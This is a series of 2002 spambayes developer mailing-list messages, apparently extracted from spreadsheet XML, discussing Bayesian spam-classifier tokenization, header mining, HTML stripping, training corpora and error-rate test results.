&gt;       1.087   3.052
&gt;       0.000   6.822
&gt; Training on  &amp;  /home/jeremy/Mail/spam 0&gt;
&gt;  ... 644 hams &amp; 557 spams
&gt;       0.776   3.411
&gt;       0.776   3.411
&gt;       0.000   6.463
&gt; total false pos 97 3.76552795031
&gt; total false neg 738 33.1238779174
&gt;
&gt; Is it safe to conclude that avoiding any cleverness with headers is a
&gt; good thing?Since I don't know what you did, exactly, I can't guess.  What you seemed to
show is that you did *something* clever with headers and that doing so
helped (the "after" numbers are better than the "before" numbers, right?).
Assuming that what you did was override what's now
tokenizer.Tokenizer.tokenize_headers with some other routine, and didn't
call the base Tokenizer.tokenize_headers at all, then you're missing
carefully tested treatment of just a few header fields, but adding many
dozens of other header fields.  There's no question that adding more header
fields should help; tokenizer.Tokenizer.tokenize_headers doesn't do so only
because my testing corpora are such that I can't add more headers without
getting major benefits for bogus reasons.Apart from all that, you said you're skipping Received.  By several
accounts, that may be the most valuable of all the header fields.  I'm
(meaning tokenizer.Tokenizer.tokenize_headers) skipping them too for the
reason explained above.  Offline a week or two ago, Neil Schemenauer
reported good results from this scheme:    ip_re = re.compile(r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})')    for header in msg.get_all("received", ()):
        for ip in ip_re.findall(header):
            parts = ip.split(".")
            for n in range(1, 5):
                yield 'received:' + '.'.join(parts[:n])This makes a lot of sense to me; I just checked it in, but left it disabled
for now.</t>
  </si>
  <si>
    <t>[Guido]
&gt; Perhaps more useful would be if Tim could check in the pickle(s?)
&gt; generated by one of his training runs, so that others can see how
&gt; Tim's training data performs against their own corpora.I did that yesterday, but seems like nobody bit.  Just in case , I
uploaded a new version just now.  Since MINCOUNT went away, UNKNOWN_SPAMPROB
is much less likely, and there's almost nothing that can be pruned away (so
the file is about 5x larger now).    http://sf.net/project/showfiles.php?group_id=61702
&gt; This could also be the starting point for a self-contained distribution
&gt; (you've got to start with *something*, and training with python-list data
&gt; seems just as good as anything else).The only way to know anything here is for someone to try it.</t>
  </si>
  <si>
    <t>Here's clarification of why I did:First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43.5368043088Second test results using mboxtest.MyTokenizer.tokenize_headers().
This uses all headers except Received, Data, and X-From_.Training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33.1238779174Jeremy</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; [Guido]
&gt; &gt; Perhaps more useful would be if Tim could check in the pickle(s?)
&gt; &gt; generated by one of his training runs, so that others can see how
&gt; &gt; Tim's training data performs against their own corpora.[Tim]
&gt; I did that yesterday, but seems like nobody bit.I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and/or HTML.So I guess I'll have to retrain it (yes, you told me so :-).&gt; Just in case , I
&gt; uploaded a new version just now.  Since MINCOUNT went away, UNKNOWN_SPAMPROB
&gt; is much less likely, and there's almost nothing that can be pruned away (so
&gt; the file is about 5x larger now).
&gt; 
&gt;     http://sf.net/project/showfiles.php?group_id=61702I'll try this when I have time.--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Before we get too far down this road, what do people think of creating a
spambayes package containing classifier and tokenizer?  This is just to
minimize clutter in site-packages.Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">[Jeremy Hylton]
&gt; Here's clarification of why I did:That's pretty much what I had guessed.  Thanks!  One more to try:&gt; First test results using tokenizer.Tokenizer.tokenize_headers()
&gt; unmodified. 
&gt; ...
&gt; Second test results using mboxtest.MyTokenizer.tokenize_headers().
&gt; This uses all headers except Received, Data, and X-From_.
&gt; ...Try the latter again, but call the base tokenize_headers() too.
</t>
  </si>
  <si>
    <t>&gt; Before we get too far down this road, what do people think of creating a
&gt; spambayes package containing classifier and tokenizer?  This is just to
&gt; minimize clutter in site-packages.Too early IMO (if you mean to leave the various other tools out of
it).  If and when we package this, perhaps we should use Barry's trick
from the email package for making the package itself the toplevel dir
of the distribution (rather than requiring an extra directory level
just so the package can be a subdir of the distro).--Guido van Rossum (home page: http://www.python.org/~guido/)</t>
  </si>
  <si>
    <t>[Guido, on the classifier pickle on SF]
&gt; I downloaded and played with it a bit, but had no time to do anything
&gt; systematic.Cool!&gt; It correctly recognized a spam that slipped through SA.Ditto.&gt; But it also identified as spam everything in my inbox that had any
&gt; MIME structure or HTML parts, and several messages in my saved 'zope
&gt; geeks' list that happened to be using MIME and/or HTML.Do you know why?  The strangest implied claim there is that it hates MIME
independent of HTML.  For example, the spamprob of 'content-type:text/plain'
in that pickle is under 0.21.  'content-type:multipart/alternative' gets
0.93, but that's not a killer clue, and one bit of good content will more
than cancel it out.WRT hating HTML, possibilities include:1. It really had to do with something other than MIME/HTML.2. These are pure HTML (not multipart/alternative with a text/plain part),
   so that the tags aren't getting stripped.  The pickled classifier
   despises all hints of HTML due to its c.l.py heritage.3. These are multipart/alternative with a text/plain part, but the
   latter doesn't contain the same text as the text/html part (for
   example, as Anthony reported, perhaps the text/plain part just
   says something like "This is an HMTL message.").If it's #2, it would be easy to add an optional bool argument to tokenize()
meaning "even if it is pure HTML, strip the tags anyway".  In fact, I'd like
to do that and default it to True.  The extreme hatred of HTML on tech lists
strikes me as, umm, extreme .&gt; So I guess I'll have to retrain it (yes, you told me so :-).That would be a different experiment.  I'm certainly curious to see whether
Jeremy's much-worse-than-mine error rates are typical or aberrant.</t>
  </si>
  <si>
    <t>&gt; &gt; But it also identified as spam everything in my inbox that had any
&gt; &gt; MIME structure or HTML parts, and several messages in my saved 'zope
&gt; &gt; geeks' list that happened to be using MIME and/or HTML.
&gt; 
&gt; Do you know why?  The strangest implied claim there is that it hates MIME
&gt; independent of HTML.  For example, the spamprob of 'content-type:text/plain'
&gt; in that pickle is under 0.21.  'content-type:multipart/alternative' gets
&gt; 0.93, but that's not a killer clue, and one bit of good content will more
&gt; than cancel it out.I reran the experiment (with the new SpamHam1.pik, but it doesn't seem
to make a difference).  Here are the clues for the two spams in my
inbox (in hammie.py's output format, which sorts the clues by
probability; the first two numbers are the message number and overall
probability; then line-folded):    66 1.00 S 'facility': 0.01; 'speaker': 0.01; 'stretch': 0.01;
    'thursday': 0.01; 'young,': 0.01; 'mistakes': 0.12; 'growth':
    0.85; '&gt;content-type:text/plain': 0.85; 'please': 0.85; 'capital':
    0.92; 'series': 0.92; 'subject:Don': 0.94; 'companies': 0.96;
    '&gt;content-type:text/html': 0.96; 'fee': 0.96; 'money': 0.96;
    '8:00am': 0.99; '9:00am': 0.99; '&gt;content-type:image/gif': 0.99;
    '&gt;content-type:multipart/alternative': 0.99; 'attend': 0.99;
    'companies,': 0.99; 'content-type/type:multipart/alternative':
    0.99; 'content-type:multipart/related': 0.99; 'economy': 0.99;
    'economy"': 0.99This has 6 content-types as spam clues, only one of which is related
to HTML, despite there being an HTML alternative (and 12 other spam
clues, vs. only 6 ham clues).  This was an announcement of a public
event by our building owners, with a text part that was the same as
the HTML (AFAICT).  Its language may be spammish, but the content-type
clues didn't help.  (BTW, it makes me wonder about the wisdom of
keeping punctuation -- 'economy' and 'economy"' to me don't seem to
deserve two be counted as clues.)    76 1.00 S '(near': 0.01; 'alexandria': 0.01; 'conn': 0.01;
    'from:adam': 0.01; 'from:email addr:panix': 0.01; 'poked': 0.01;
    'thorugh': 0.01; 'though': 0.03; "i'm": 0.03; 'reflect': 0.05;
    "i've": 0.06; 'wednesday': 0.07; 'content-disposition:inline':
    0.10; 'contacting': 0.93; 'sold': 0.96; 'financially': 0.98;
    'prices': 0.98; 'rates': 0.99; 'discount.': 0.99; 'hotel': 0.99;
    'hotels': 0.99; 'hotels.': 0.99; 'nights,': 0.99; 'plaza': 0.99;
    'rates,': 0.99; 'rates.': 0.99; 'rooms': 0.99; 'season': 0.99;
    'stations': 0.99; 'subject:Hotel': 0.99Here is the full message (Received: headers stripped), with apologies
to Ziggy and David:"""
Date: Fri, 06 Sep 2002 17:17:13 -0400
From: Adam Turoff 
Subject: Hotel information
To: guido@python.org, davida@activestate.com
Message-id: &lt;20020906211713.GK7451@panix.com&gt;
MIME-version: 1.0
Content-type: text/plain; charset=us-ascii
Content-disposition: inline
User-Agent: Mutt/1.4iI've been looking into hotels.  I poked around expedia for availability
from March 26 to 29 (4 nights, wednesday thorugh saturday).  I've also started contacting hotels for group rates; some of the group
rates are no better than the regular rates, and they require signing a
contract with a minimum number of rooms sold (with someone financially
responsible for unbooked rooms).  Most hotels are less than responsive...	Radission - Barcelo Hotel (DuPont Circle)
	$125/night, $99/weekend	State Plaza hotel (Foggy Bottom; near GWU)
	$119/night, $99/weekend	Hilton Silver Spring (Near Metro, in suburban MD)
	$99/hight, $74/weekend	Windsor Park Hotel
	Conn Ave, between DuPont Circle/Woodley Park Metro stations
	$95/night; needs a car	Econo Lodge Alexandria (Near Metro, in suburban VA)
	$95/nightThis is a hand picked list; I ignored anything over $125/night, even
though there are some really well situated hotels nearby at higher rates.
Also, I'm not sure how much these prices reflect an expedia-only
discount.  I can't vouch for any of these hotels, either.I also found out that the down season for DC Hotels are mid-june through
mid-september, and mid-november through mid-january.Z.
"""This one has no MIME structure nor HTML!  It even has a
Content-disposition which is counted as a non-spam clue.  It got
f-p'ed because of the many hospitality-related and money-related
terms.  I'm surprised $125/night and similar aren't clues too.  (And
again, several spam clues are duplicated with different variations:
'hotel', 'hotels', 'hotels.', 'subject:Hotel', 'rates,', 'rates.'.&gt; WRT hating HTML, possibilities include:
&gt; 
&gt; 1. It really had to do with something other than MIME/HTML.
&gt; 
&gt; 2. These are pure HTML (not multipart/alternative with a text/plain part),
&gt;    so that the tags aren't getting stripped.  The pickled classifier
&gt;    despises all hints of HTML due to its c.l.py heritage.
&gt; 
&gt; 3. These are multipart/alternative with a text/plain part, but the
&gt;    latter doesn't contain the same text as the text/html part (for
&gt;    example, as Anthony reported, perhaps the text/plain part just
&gt;    says something like "This is an HMTL message.").
&gt; 
&gt; If it's #2, it would be easy to add an optional bool argument to tokenize()
&gt; meaning "even if it is pure HTML, strip the tags anyway".  In fact, I'd like
&gt; to do that and default it to True.  The extreme hatred of HTML on tech lists
&gt; strikes me as, umm, extreme .I also looked in more detail at some f-p's in my geeks traffic.  The
first one's a doozie (that's the term, right? :-).  It has lots of
HTML clues that are apparently ignored.  It was a multipart/mixed with
two parts: a brief text/plain part containing one or two sentences, a
mondo weird URL:http://x60.deja.com/[ST_rn=ps]/getdoc.xp?AN=687715863&amp;CONTEXT=973121507.1408827441&amp;hitnum=23and some employer-generated spammish boilerplate; the second part was
the HTML taken directly from the above URL.  Clues:    43 1.00 S '"main"': 0.01; '(later': 0.01; '(lots': 0.01; '--paul':
    0.01; '1995-2000': 0.01; 'adopt': 0.01; 'apps': 0.01; 'commands':
    0.01; 'deja.com': 0.01; 'dejanews,': 0.01; 'discipline': 0.01;
    'duct': 0.01; 'email addr:digicool': 0.01; 'email name:paul':
    0.01; 'everitt': 0.01; 'exist,': 0.01; 'forwards': 0.01;
    'framework': 0.01; 'from:email addr:digicool': 0.01; 'from:email
    name:1:22': 0.01; 'http&gt;1:24': 0.01;
    'http&gt;1:57': 0.01; 'http&gt;1:an': 0.01; 'http&gt;1:author': 0.01;
    'http&gt;1:fmt': 0.01; 'http&gt;1:getdoc': 0.01; 'http&gt;1:pr': 0.01;
    'http&gt;1:products': 0.01; 'http&gt;1:query': 0.01; 'http&gt;1:search':
    0.01; 'http&gt;1:viewthread': 0.01; 'http&gt;1:xp': 0.01; 'http&gt;1:zope':
    0.01; 'inventing': 0.01; 'jsp': 0.01; 'jsp.': 0.01; 'logic': 0.01;
    'maps': 0.01; 'neo': 0.01; 'newsgroup,': 0.01; 'object': 0.01;
    'popup': 0.01; 'probable': 0.01; 'query': 0.01; 'query,': 0.01;
    'resizes': 0.01; 'servlet': 0.01; 'skip:? 20': 0.01; 'stems':
    0.01; 'subject:JSP': 0.01; 'sucks!': 0.01; 'templating': 0.01;
    'tempted': 0.01; 'url.': 0.01; 'usenet': 0.01; 'usenet,': 0.01;
    'wrote': 0.01; 'x-mailer:mozilla 4.74 [en] (windows nt 5.0; u)':
    0.01; 'zope': 0.01; '#000000;': 0.99; '#cc0000;': 0.99;
    '#ff3300;': 0.99; '#ff6600;': 0.99; '#ffffff;': 0.99; 'Â©':
    0.99; '&gt;': 0.99; 'Â Â ': 0.99; '"no': 0.99;
    '.med': 0.99; '.small': 0.99; '0pt;': 0.99; '0px;': 0.99; '10px;':
    0.99; '11pt;': 0.99; '12px;': 0.99; '18pt;': 0.99; '18px;': 0.99;
    '1pt;': 0.99; '2px;': 0.99; '640;': 0.99; '8pt;': 0.99; '&lt;!--':
    0.99; '&lt;/b&gt;': 0.99; '': 0.99; '': 0.99; '':
    0.99; '': 0.99; '': 0.99; '': 0.99;
    '': 0.99; '': 0.99; '': 0.99; '':
    0.99; '': 0.99; '': 0.99; 'Â ': 0.99; '':
    0.99; '': 0.99; '': 0.99; 'a': 0.99; '</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; I also looked in more detail at some f-p's in my geeks traffic.  The
&gt; &gt; first one's a doozie (that's the term, right? :-).  It has lots of
&gt; &gt; HTML clues that are apparently ignored.
&gt; 
&gt; ?? The clues below are *loaded* with snippets unique to HTML (like '').I *meant* to say that they were 0.99 clues cancelled out by 0.01
clues.  But that's wrong too!  It looks I haven't grokked this part of
your code yet; this one has way more than 16 clues, and it seems the
classifier basically ended up counting way more 0.99 than 0.01 clues,
and no others made it into the list.  I thought it was looking for
clues with values in between; apparently it found none that weren't
exactly 0.5?&gt; That sure sets the record for longest list of cancelling extreme clues!This happened to be the longest one, but there were quite a few
similar ones.  I wonder if there's anything we can learn from looking
at the clues and the HTML.  It was heavily marked-up HTML, with ads in
the sidebar, but the body text was a serious discussion of "OO and
soft coding" with lots of highly technical words as clues (including
Zope and ZEO).&gt; That there are *any* 0.50 clues in here means the scheme ran out of
&gt; anything interesting to look at.  Adding in more header lines should
&gt; cure that.Are there any minable-but-unmined header lines in your corpus left?
Or do we have to start with a different corpus before we can make
progress there?&gt; &gt; The seventh was similar.
&gt; &gt;
&gt; &gt; I scanned a bunch more until I got bored, and most of them were either
&gt; &gt; of the first form (brief text with URL followed by quoted HTML from
&gt; &gt; website)
&gt; 
&gt; If those were text/plain, the HTML tags should have been stripped.  I'm
&gt; still confused about this part.No, sorry.  These were all of the following structure:  multipart/mixed
      text/plain        (brief text plus URL(s))
      text/html         (long HTML copied from website)I guess you get this when you click on "mail this page" in some
browsers.&gt; That HTML tags aren't getting stripped remains the biggest mystery to me.Still?&gt; This seems confused: Jeremy didn't use my trained classifier pickle,
&gt; he trained his own classifier from scratch on his own corpora.
&gt; That's an entirely different kind of experiment from the one you're
&gt; trying (indeed, you're the only one so far to report results from
&gt; trying my pickle on their own email, and I never expected *that* to
&gt; work well; it's a much bigger mystery to me why Jeremy got such
&gt; relatively worse results from training his own -- and he's the only
&gt; one so far to report results from *that* experiment).I think it's still corpus size.--Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t>[Guido]
&gt; I *meant* to say that they were 0.99 clues cancelled out by 0.01
&gt; clues.  But that's wrong too!  It looks I haven't grokked this part of
&gt; your code yet; this one has way more than 16 clues, and it seems the
&gt; classifier basically ended up counting way more 0.99 than 0.01 clues,
&gt; and no others made it into the list.  I thought it was looking for
&gt; clues with values in between; apparently it found none that weren't
&gt; exactly 0.5?There's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you'd have no clue that massive cancellation was occurring;
and massive cancellation may yet turn out to be a hook to signal that manual
review is needed).  In your specific case, the excess of clues in the longer
MAX_SPAMPROB list pushed everything else out of the nbest heap, and that's
why you didn't see anything other than 0.01 and 0.99.Before adding these special lists, the outcome when faced with many 0.01 and
0.99 clues was too often a coin toss:  whichever flavor just happened to
appear MAX_DISCRIMINATORS//2 + 1 times first determined the final outcome.&gt;&gt; That sure sets the record for longest list of cancelling extreme clues!&gt; This happened to be the longest one, but there were quite a few
&gt; similar ones.I just beat it :  a tokenization scheme that folds case, and ignores
punctuation, and strips a trailing 's' from words, and saves both word
bigrams and word unigrams, turned up a low-probability very long spam with a
list of 410 0.01 clues and 125 0.99 clues!  Yikes.&gt; I wonder if there's anything we can learn from looking at the clues and
the
&gt; HTML.  It was heavily marked-up HTML, with ads in the sidebar, but the
body
&gt; text was a serious discussion of "OO and soft coding" with lots of highly
&gt; technical words as clues (including Zope and ZEO).No matter how often it says Zope, it gets only one 0.01 clue from doing so.
Ditto for ZEO.  In contrast, HTML markup has many unique "words" that get
0.99.  BTW, this is a clear case where the assumption of
conditionally-independent word probabilities is utterly bogus -- e.g., the
probability that "" appears in a message is highly correlated with the
prob of "" appearing.  By treating them as independent, naive Bayes
grossly misjudges the probability that both appear, and the only thing you
get in return is something that can actually be computed .Read the "What about HTML?" section in tokenizer.py.  From the very start,
I've been investigating what would work best for the mailing lists hosted at
python.org, and HTML decorations have so far been too strong a clue to
justify ignoring it in that specific context.  I haven't done anything
geared toward personal email, including the case of non-mailing-list email
that happens to go through python.org.I'd prefer to strip HTML tags from everything, but last time I tried that it
still had bad effects on the error rates in my corpora (the full test
results with and without HTML tag stripping is included in the "What about
HTML?" comment block).  But as the comment block also says,# XXX So, if another way is found to slash the f-n rate, the decision here
# XXX not to strip HTML from HTML-only msgs should be revisited.and we've since done several things that gave significant f-n rate
reductions.  I should test that again now.&gt; Are there any minable-but-unmined header lines in your corpus left?Almost all of them -- apart from MIME decorations that appear in both
headers and bodies (like Content-Type), the *only* header lines the base
tokenizer looks at now are Subject, From, X-Mailer, and Organization.&gt; Or do we have to start with a different corpus before we can make
&gt; progress there?I would need different data, yes.  My ham is too polluted with Mailman
header decorations (which I may or may not be able to clean out, but fudging
the data is a Mortal Sin and I haven't changed a byte so far), and my spam
too polluted with header clues about the fellow who collected it.  In
particular I have to skip To and Received headers now, and I suspect they're
going to be very valuable in real life (for example, I don't even catch
"undisclosed recipients" in the To header now!).&gt; ...
&gt; No, sorry.  These were all of the following structure:
&gt;
&gt;   multipart/mixed
&gt;       text/plain        (brief text plus URL(s))
&gt;       text/html         (long HTML copied from website)Ah!  That explains why the HTML tags didn't get stripped.  I'd again offer
to add an optional argument to tokenize() so that they'd get stripped here
too, but if it gets glossed over a third time that would feel too much like
a loss .&gt;&gt; This seems confused: Jeremy didn't use my trained classifier pickle,
&gt;&gt; he trained his own classifier from scratch on his own corpora.
&gt;&gt; ...&gt; I think it's still corpus size.I reported on tests I ran with random samples of 220 spams and 220 hams from
my corpus (that means training on sets of those sizes as well as predicting
on sets of those sizes), and while that did harm the error rates, the error
rates I saw were still much better than Jeremy reported when using 500 of
each.
Ah, a full test run just finished, on the   tokenization scheme that folds case, and ignores punctuation, and strips
a
   trailing 's' from words, and saves both word bigrams and word unigramsThis is the code:            # Tokenize everything in the body.
            lastw = ''
            for w in word_re.findall(text):
                n = len(w)
                # Make sure this range matches in tokenize_word().
                if 3 &lt;= n &lt;= 12:
                    if w[-1] == 's':
                        w = w[:-1]
                    yield w
                    if lastw:
                        yield lastw + w
                    lastw = w + ' '                elif n &gt;= 3:
                    lastw = ''
                    for t in tokenize_word(w):
                        yield twhere    word_re = re.compile(r"[\w$\-\x80-\xff]+")This at least doubled the process size over what's done now.  It helped the
f-n rate significantly, but probably hurt the f-p rate (the f-p rate is too
low with only 4000 hams per run to be confident about changes of such small
*absolute* magnitude -- 0.025% is a single message in the f-p table):false positive percentages
    0.000  0.000  tied
    0.000  0.075  lost  +(was 0)
    0.050  0.125  lost  +150.00%
    0.025  0.000  won   -100.00%
    0.075  0.025  won    -66.67%
    0.000  0.050  lost  +(was 0)
    0.100  0.175  lost   +75.00%
    0.050  0.050  tied
    0.025  0.050  lost  +100.00%
    0.025  0.000  won   -100.00%
    0.050  0.125  lost  +150.00%
    0.050  0.025  won    -50.00%
    0.050  0.050  tied
    0.000  0.025  lost  +(was 0)
    0.000  0.025  lost  +(was 0)
    0.075  0.050  won    -33.33%
    0.025  0.050  lost  +100.00%
    0.000  0.000  tied
    0.025  0.100  lost  +300.00%
    0.050  0.150  lost  +200.00%won   5 times
tied  4 times
lost 11 timestotal unique fp went from 13 to 21false negative percentages
    0.327  0.218  won    -33.33%
    0.400  0.218  won    -45.50%
    0.327  0.218  won    -33.33%
    0.691  0.691  tied
    0.545  0.327  won    -40.00%
    0.291  0.218  won    -25.09%
    0.218  0.291  lost   +33.49%
    0.654  0.473  won    -27.68%
    0.364  0.327  won    -10.16%
    0.291  0.182  won    -37.46%
    0.327  0.254  won    -22.32%
    0.691  0.509  won    -26.34%
    0.582  0.473  won    -18.73%
    0.291  0.255  won    -12.37%
    0.364  0.218  won    -40.11%
    0.436  0.327  won    -25.00%
    0.436  0.473  lost    +8.49%
    0.218  0.218  tied
    0.291  0.255  won    -12.37%
    0.254  0.364  lost   +43.31%won  15 times
tied  2 times
lost  3 timestotal unique fn went from 106 to 94</t>
  </si>
  <si>
    <t>[Tim]
&gt; ...
&gt; I'd prefer to strip HTML tags from everything, but last time I
&gt; tried that it still had bad effects on the error rates in my
&gt; corpora (the full test results with and without HTML tag stripping
&gt; is included in the "What about HTML?" comment block).  But as the
&gt; comment block also says,
&gt;
&gt; # XXX So, if another way is found to slash the f-n rate, the decision here
&gt; # XXX not to strip HTML from HTML-only msgs should be revisited.
&gt;
&gt; and we've since done several things that gave significant f-n rate
&gt; reductions.  I should test that again now.I did so.  Alas, stripping HTML tags from all text still hurts the f-n rate
in my test data:false positive percentages
    0.000  0.000  tied
    0.000  0.000  tied
    0.050  0.075  lost   +50.00%
    0.025  0.025  tied
    0.075  0.025  won    -66.67%
    0.000  0.000  tied
    0.100  0.100  tied
    0.050  0.075  lost   +50.00%
    0.025  0.025  tied
    0.025  0.000  won   -100.00%
    0.050  0.075  lost   +50.00%
    0.050  0.050  tied
    0.050  0.025  won    -50.00%
    0.000  0.000  tied
    0.000  0.000  tied
    0.075  0.075  tied
    0.025  0.025  tied
    0.000  0.000  tied
    0.025  0.025  tied
    0.050  0.050  tiedwon   3 times
tied 14 times
lost  3 timestotal unique fp went from 13 to 11false negative percentages
    0.327  0.400  lost   +22.32%
    0.400  0.400  tied
    0.327  0.473  lost   +44.65%
    0.691  0.654  won     -5.35%
    0.545  0.473  won    -13.21%
    0.291  0.364  lost   +25.09%
    0.218  0.291  lost   +33.49%
    0.654  0.654  tied
    0.364  0.473  lost   +29.95%
    0.291  0.327  lost   +12.37%
    0.327  0.291  won    -11.01%
    0.691  0.654  won     -5.35%
    0.582  0.655  lost   +12.54%
    0.291  0.400  lost   +37.46%
    0.364  0.436  lost   +19.78%
    0.436  0.582  lost   +33.49%
    0.436  0.364  won    -16.51%
    0.218  0.291  lost   +33.49%
    0.291  0.400  lost   +37.46%
    0.254  0.327  lost   +28.74%won   5 times
tied  2 times
lost 13 timestotal unique fn went from 106 to 122Last time I tried this (see tokenizer.py comments), the f-n rate after
stripping tags ranged from 0.982% to 1.781%, with a median of about 1.34%,
so we've made tons of progress on the f-n rate since then.  But the mere
presence of HTML tags still remains a significant clue for c.l.py traffic,
so I'm left with the same comment:&gt; # XXX So, if another way is found to slash the f-n rate, the decision here
&gt; # XXX not to strip HTML from HTML-only msgs should be revisited.If we want to take the focus of this away from c.l.py traffic, I can't say
what effect HTML stripping would have (I don't have suitable test data to
measure that on).</t>
  </si>
  <si>
    <t xml:space="preserve">
    &gt;&gt; Before we get too far down this road, what do people think of
    &gt;&gt; creating a spambayes package containing classifier and tokenizer?
    &gt;&gt; This is just to minimize clutter in site-packages.    Guido&gt; Too early IMO (if you mean to leave the various other tools out
    Guido&gt; of it).Well, I mentioned classifier and tokenize only because I thought they were
the only importable modules.  The rest represent script-level code, right?    Guido&gt; If and when we package this, perhaps we should use Barry's trick
    Guido&gt; from the email package for making the package itself the toplevel
    Guido&gt; dir of the distribution (rather than requiring an extra directory
    Guido&gt; level just so the package can be a subdir of the distro).That would be perfect.  I tried in the naive way last night, but wound up
with all .py files in the package, which wasn't my intent.Skip
</t>
  </si>
  <si>
    <t xml:space="preserve">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28Anthony's header counting code does not seem to help.  Neil
</t>
  </si>
  <si>
    <t>[Neil Schemenauer]
&gt; These results are from timtest.py.  I've got three sets of spam and ham
&gt; with about 500 messages in each set.  Here's what happens when I enable
&gt; my latest "received" header code:If you've still got the summary files, please cvs up and try running cmp.py
again -- in the process of generalizing cmp.py, you managed to make it skip
half the lines .  That is, if you've got N sets, you *should* get
N**2-N pairs for each error rate.  You have 3 sets, so you should get 6
pairs of f-n rates and 6 pairs of f-p rates.&gt;     false positive percentages
&gt;         0.187  0.187  tied
&gt;         0.749  0.562  won    -24.97%
&gt;         0.780  0.585  won    -25.00%
&gt;
&gt;     won   2 times
&gt;     tied  1 times
&gt;     lost  0 times
&gt;
&gt;     total unique fp went from 19 to 17
&gt;
&gt;     false negative percentages
&gt;         2.072  1.318  won    -36.39%
&gt;         2.448  1.318  won    -46.16%
&gt;         0.574  0.765  lost   +33.28%
&gt;
&gt;     won   2 times
&gt;     tied  0 times
&gt;     lost  1 times
&gt;
&gt;     total unique fn went from 43 to 28Looks promising!  Getting 6 lines of output for each block would give a
clearer picture, of course.&gt; Anthony's header counting code does not seem to help.It helps my test data too much .</t>
  </si>
  <si>
    <t>Neil trained a classifier using 3 sets with about 500 ham and spam in each.
We're missing half his test run results due to a cmp.py bug (since fixed);
the "before custom fiddling" figures on the 3 reported runs were:    false positive percentages
        0.187
        0.749
        0.780
    total unique fp 19    false negative percentages
        2.072
        2.448
        0.574
    total unique fn 43The "total unique" figures counts all 6 runs; it's just the individual-run
fp and fn percentages we're missing for 3 runs.Jeremy reported these "before custom fiddling" figures on 4 sets with about
600 ham and spam in each:    false positive percentages
        0.000
        1.398
        1.398
        0.000
        1.242
        1.242
        1.398
        1.398
        0.000
        1.553
        1.553
        0.000
    total unique fp 139    false negative percentages
       10.413
        6.104
        5.027
        8.259
        2.873
        5.745
        5.206
        4.488
        9.336
        5.206
        5.027
        9.874
    total unique fn 970So things are clearly working much better for Neil.  Both reported
significant improvements in both f-n and f-p rates by folding in more header
lines.  Neal added Received analysis to the base tokenizer's header
analysis, and Jeremy skipped the base tokenizer's header analysis completely
but added base-subject-line-like but case-folded tokenization for almost all
header lines (excepting only Received, Data, X-From_, and, I *suspect*, all
those starting with 'x-vm').When I try 5 random pairs of 500-ham + 500-spam subsets in my test data, I
see:    false positive percentages
        0.000
        0.000
        0.200
        0.000
        0.200
        0.000
        0.200
        0.000
        0.000
        0.200
        0.400
        0.000
        0.200
        0.000
        0.200
        0.400
        0.000
        0.400
        0.200
        0.600
    total unique fp 10    false negative percentages
        0.800
        0.400
        0.200
        0.600
        1.000
        0.000
        0.600
        1.200
        1.200
        0.800
        0.400
        0.800
        1.800
        0.800
        0.400
        1.000
        1.000
        0.400
        0.000
        0.600
    total unique fn 36This is much closer to what Neil saw, but still looks better.  Another run
on a disjoint 5 random pairs looked much the same; total unique fp rose to
12 and fn fell to 27; on a third run with another set of disjoint 5 random
pairs, likewise, with fp 12 and fn 40.  So I'm pretty confident that it's
not going to matter which random subsets of 500 I take from my data.It's hard to conclude anything given Jeremy's much worse results.  If they
were in line with Neil's results, I'd suspect that I've over-tuned the
algorithm to statistical quirks in my corpora.</t>
  </si>
  <si>
    <t>[Tim]
&gt; One effect of getting rid of MINCOUNT is that it latches on more
&gt; strongly to rare clues now, and those can be unique to the corpus
&gt; trained on (e.g., one trained ham says "gryndlplyx!", and a followup
&gt; new ham quotes it).This may be a systematic bias in the testing procedure:  in real life, msgs
come ordered in time.  Say there's a thread that spans N messages on c.l.py.
In our testing setup, we'll train on a random sampling throughout its whole
lifetime, and test likewise.  New ham "in the middle" of this thread gets
benefit from that we trained on msgs that appeared both before and *after*
it in real life.  It's quite plausible that the f-p rate would rise without
this effect; in real life, at any given time some number of ham threads will
just be starting their lives, and if they're at all unusual the trained data
will know little to nothing about them.</t>
  </si>
  <si>
    <t>[Greg Ward]
&gt; Case of headers is definitely helpful.  SpamAssassin has a rule for it
&gt; -- if you have headers like "DATE" or "SUBJECT", you get a few more
&gt; points.Across my data, all-caps DATE, SUBJECT, TO, etc indeed appear only in the
spam collections.  OTOH, they don't appear often -- less than 1% of spam
messages have at least one of these all-cap header lines.  But when I'm
fighting what are now sub-1% f-n rates, even rare clues can help!</t>
  </si>
  <si>
    <t>[Neale Pickett]
&gt; ...
&gt; If you can spare the memory, you might get better performance in this
&gt; case using the pickle store, since it only has to go to disk once (but
&gt; boy, does it ever go to disk!)  I can't think of anything obvious to
&gt; speed things up once it's all loaded into memory, though.On my box the current system scores about 50 msgs per second (starting in
memory, of course).  While that can be a drag while waiting for one of my
full test runs to complete (one of those scores a message more than 120,000
times, and trains more than 30,000 times), I've got no urge to do any speed
optimizations -- if I were using this for my own email, I'd never notice the
drag.  Guido will bitch like hell about waiting an extra second for his
50-msg batches to score, but he's the boss so he bitches about everything
.&gt; That's profiler territory, and profiling is exactly the kind of
&gt; optimization I just said I wasn't going to do :)I haven't profiled yet, but *suspect* there aren't any egregious hot spots.
5-gram'ing of long words with high-bit characters is likely overly expensive
*when* it happens, but it doesn't happen that often, and as an approach to
non-English languages it sucks anyway (i.e., there's no point speeding
something that ought to be replaced entirely).</t>
  </si>
  <si>
    <t>[Guido]
&gt; There seem to be two "drivers" for the classifier now: Neale Pickett's
&gt; hammie.py, and the original GBayes.py.  According to the README.txt,
&gt; GBayes.py hasn't been kept up to date.It seemed that way to me when I ripped the classifier out of it -- I don't
think anyone has touched it after.&gt; Is there anything in there that isn't covered by hammie.py?Someone else will have to answer that (I don't use GBayes or hammie, at
least not yet).&gt; About the only useful feature of GBayes.py that hammie.py doesn't (yet)
&gt; copy is -u, which calculates spamness for an entire mailbox.  This
&gt; feature can easily be copied into hammie.py.That's been done now, right?&gt; (GBayes.py also has a large collection of tokenizers; but timtoken.py
&gt; rules, so I'm not sure how interesting that is now.)Those tokenizers are truly trivial to rewrite from scratch if they're
